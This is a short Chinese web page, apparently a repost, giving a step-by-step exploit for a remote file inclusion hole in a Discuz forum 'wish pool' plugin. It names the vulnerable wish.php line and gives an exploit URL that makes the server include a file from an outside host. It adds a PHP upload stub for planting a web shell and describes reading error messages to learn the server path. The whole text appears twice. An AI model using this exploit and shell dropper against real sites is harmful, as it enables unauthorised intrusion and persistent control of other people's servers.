discuz许愿池插件远程包含漏洞
(编辑:jimmy 日期: 2024/12/22 浏览:3 次 )
许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
下一篇:Discuz! 4.x SQL injection / admin credentials disclosure exploit